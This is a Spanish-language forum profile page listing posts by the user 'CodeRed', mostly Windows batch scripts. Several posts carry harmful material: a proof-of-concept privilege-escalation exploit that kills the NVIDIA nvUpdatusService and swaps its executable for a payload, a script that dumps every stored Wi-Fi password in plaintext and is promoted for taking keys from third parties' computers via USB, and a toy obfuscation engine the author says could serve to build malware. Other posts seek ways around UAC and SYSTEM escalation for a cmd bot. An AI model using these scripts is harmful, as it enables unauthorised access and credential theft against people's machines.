Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - CodeRed

#1
Es una tonteria pero es muy util para batch, este pequeño script permite invocandolo generar una variable de entorno de nombre N con un rango especifico X-Y

Su sintaxis seria:

Range "NombreVariable" "max" "min"

Donde "NombreVariable" seria una que nosotros eligieramos y "max" y "min" seria el rango de numeros que querramos manejar

Ejemplo:

Range resultado 100 1

Estet comando generaria una salida de un munero aleatorio dentro del rango y una varuable de nombre resultado que almacenaria dicho numero generado

Pequeño pero eficaz  ;D


@echo off
set /a %1=(%RANDOM%*%2/32768)+%3
setlocal enabledelayedexpansion
echo !%1!
exit /b



Esto le da mas juego a la variable %random%
#2
Saludos gente, e codeado este minimotor polimorfico como experimento para quedarme con el concepto de funcionamiento y esto es lo que me a salido, no se si tendra alguna utilidad pero es curioso cuando menos.


La sintaxis del script seria algo asi


Para generar una cadena cifrada y de X longitud
poli "cadena de texto"

Para resolver la cadena previamente cifrada
poli /d "%str%"


El codigo basicamente lo que hace es coger una cadena de TEXTO (solo esta pensado para texto no numeros) y nos devolvera la cadena cifrada y con una longitud variable cada vez que pasa por el script (POLI)

Un ejemplo:

Paso una adena de texto:
poli "cadena de texto"

Y el resutado sera:
Cadena Longitud A / encriptacion B

Si repitiera la accion:
poli "cadena de texto"[code]
Cadea Longitud C / encriptacion D[/code]

Creo que se entiende mas o menos.
El minimotor tiene tres opciones diferentes, eso quiere decir que siempre que se ejecute elegira una de las tres opciones en base a un numero aleatorio ( por eso cada vez que se ejecuta puede variar el resultado)

Esto es lo que me a salido:

@echo off

set "stb="
set "str="

if "%1" equ "/d" (goto bucle3 "%*" && exit /b)
:main
set "str="
call :bucle2 %random% %*
set str=%str:0=,,%
set str=%str:1=,,,,%
set str=%str:2=,,%
set str=%str:3=,,,,%
set str=%str:4=,,%
set str=%str:5=,,,,%
set str=%str:6=,,%
set str=%str:7=,,,,%
set str=%str:8=,,%
set str=%str:9=,,,,%
set cr=%random:~0,1%
if "%cr%" equ "1" (call :uno && exit /b)
if "%cr%" equ "2" (call :dos && exit /b)
if "%cr%" equ "3" (call :tres && exit /b)
:goto :eof


:bucle2
set b=%random%%random%%random%
set "stb=%2,%b%,,"
set str=%str%%stb%
shift /1
if "%2" equ "" (goto :eof)
goto bucle2

:bucle3
shift
set "p=%1"
if "%p%" equ "1" (call :unod %*)
if "%p%" equ "2" (call :dosd %*)
if "%p%" equ "3" (call :tresd %*)
echo %imp:,= %
goto :eof

:uno
set str=%str:a=+%
set str=%str:e=-%
set str=%str:i=x%
set str=%str:o=/%
set str=%str:u=W%
echo %cr% %str:,= %
set "str=%cr% %str%"
exit /b

:unod
shift
set "imp=%*"
set "imp=%imp:+=a%"
set "imp=%imp:-=e%"
set "imp=%imp:x=i%"
set "imp=%imp:/=o%"
set "imp=%imp:W=u%"
echo %imp:,= %"
exit /b

:dos
set str=%str:a=-%
set str=%str:e=+%
set str=%str:i=/%
set str=%str:o=x%
set str=%str:u=W%
echo %cr% %str:,= %
set "str=%cr% %str%"
exit /b

:dosd
shift
set "imp=%*"
set "imp=%imp:-=a%"
set "imp=%imp:+=e%"
set "imp=%imp:/=i%"
set "imp=%imp:x=o%"
set "imp=%imp:W=u%"
echo "%imp:,= %"
exit /b

:tres
set str=%str:a=W%
set str=%str:e=+%
set str=%str:i=-%
set str=%str:o=x%
set str=%str:u=/%
echo %cr% %str:,= %
set "str=%cr% %str%"
exit /b

:tresd
shift
set "imp=%*"
set "imp=%imp:W=a%"
set "imp=%imp:+=e%"
set "imp=%imp:-=i%"
set "imp=%imp:x=o%"
set "imp=%imp:/=u%"
echo "%imp:,= %"
exit /b



Curioso cuando menos , y creo tiene mucho potencial este tipo de programacion para crear bichos jejejejejeje

Un saludo
#3
 Este sencillo codigo hace que el molesto aviso de windows para la activacion de la clave (slui.exe) en el administrador se procesos deje de tocarnos lo huevos en el peor momento
cumple su cometido bastante bien

Sluikiller.bat


@echo off
:cero
tasklist | find /i "slui.exe" && call :uno
ping -n 1 127.0.0.1 >null
goto cero


:uno
taskkill /IM slui.exe
ping -n 1 127.0.0.1 >null
:eof


Ya ni me preocupo de "slui.exe" jejejejeje
#4
Yo tampoco soy ningun experto ni mucho menos, nadie me a enseñado nada voy indagando por la red e intento absorver y comprender todo lo que pueda y hasta donde mi cerebro llega, gente como tu me ayudais mucho a seguir avanzando, intentare buscar la manerara de engañar a la UAC seguro que existe algun camino desde CMD y lo encontrare jejejejeje ::) >:D

Gracias EdePC !! Podeis cerrar el tema por mi parte

Un saludo
#5
Muchas gracias EdePC  por la informacion , le hechare un vistazo al link, como has mencionado e estado hechando un vistazo por exploit database y e encontrado uno de escalada de privilegios subido hace dos dias y e codeado un exploit en formato PoC no lo e podido probar porque mi equipo no consta de este servicio pero me gustaria si le pudierais hechar un vistazo y decirme , primero , si es correcta mi interpretacion de la vulnerabilidadf y si el exploit que e codeado seria funcional

Os agracdezco mucho vuestra ayuda , asi puedo ir avanzando poco a poco

Un saludo  ;D ::)


Código (dos) [Seleccionar]
@echo off


REM ===========================================
REM Descubierto por:Roberto Piña              |
REM ===========================================
REM url:"https://www.exploit-db.com/raw/48391"|
REM ===========================================
REM Codeado por:CodeRed                       |
REM ===========================================


REM Este exploit detecta y suplanta por un payload el servicio "nvUpdatusService" para ejecutar
REM codigo arbitrario cuando se inicie el sistema con privilegios elevados


for /f "Tokens=*" %%a in ('wmic service get name, pathname, displayname, startmode ^| findstr "Auto" ^| findstr /i /v "C:\Windows\\" ^| findstr /i "NVIDIA" ^| findstr /i /v """') do (call :respuesta %%a)

exit


:respuesta

  echo %* | find /i "sc qc nvUpdatusService" && for /f "tokens=*" %%b in ('sc qc nvUpdatusService ^| find /i "CORRECTO"') do (taskkill /F /FI "SERVICES eq nvUpdatusService" && replace "Ruta\MiPayload.exe" "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe")

:eof
#6
 ;D ;D ;D ;D  WAI!!! Le hecho un ojo haber si logro algun avance y te digo algo, muchas gracias por la referencia a las Pstools lastenia en un CD pero las perdi  :-( :-(

Vamos haber si nos sale algo jejejej gracias!!!  ;-) ;-)


E estado probando schtasks , como tu bien dices funciona correctamente pero no en la cuenta de usuario se debe ejecutar la consola como administrador y precisamente eso es lo que pretendo , e estado investigando y me e topado con el instalador de windows msiexec.exe , mi pregunta seria, en que contexto se ejecuta msiexec.exe? Y se podria lanzar un cmd en contexto SYSTEM a traves del instalador malformando un archivo .msi, o es una chorrada lo que estoy diciendo.

Si lo es disculpad jejeje ando aprendiendo y me voy enterando poco a poco

Un saludo

MOD: No hacer doble post. Usa el boton modificar.
#7
Lo que quiero es escalar privilegios , obviamente si se pudiera como SYSTEM , antes se solia hacer ejecutando el notepad con el comando AT pero pue parcheado e intentado hemularlo con schtasks pero no funciona , mi duda es si algun otro proceso puede ser atacado con el cmd para escalar privilegios a nivel SYSTEM
#8
Este pequeño scrupt nos audara a saber las redes wifi y las claves que dispone un sistema windows , ideal para tenerlo en una unidad USB y poder extraer las claves de red que almacena un sistema windows (Solo extrae las redes al que dicho sistema se conecto y almaceno)

@echo off

for /f "tokens=7,8" %%a in ('netsh wlan show profile') do (echo %%a %%b | find /v "lectura") >> PerfilesWifi.txt

for /f "tokens=*" %%c in ('type PerfilesWifi.txt') do (call :Contraseñas %%c)

:Contraseñas

netsh wlan show profile name=%1 key=clear >> contraseñas.txt

:eof



Una vez ejecutado el script nos creara 2 archivos en el primero nos pondra todas las redes almacenadas en el sistema y el segundo nos dara todas las claves de dichas redes almavenadas , lo mas destacable es que nos las ofrece en texto plano.

Muy util para ajenciarte las claves de ordenadores de terceros de manera automatica

Un saludo.  ;)
#9
Saludos a toda la comunidad , soy nuevo en este foro y estoy encantado de que me hayan aceptado.

Estoy intentando crear un bot con cmd y me gustaria saber si existe algun metodo para poder escalar privilegios en windows 10 usando la consola, e investigado por la red pero en todos los metodos que e podido innvestigar intervienen programas externos

Existe alguna manera de poder hacer lo mismo pero solo con lo que nos encontremos en el sistema? Desde que inabilitaron el comando AT no se como hacerlo, si alguien sabe algo del tema que me permita avanzar se lo agradeceria mucho.

Un saludo a todos los bacheros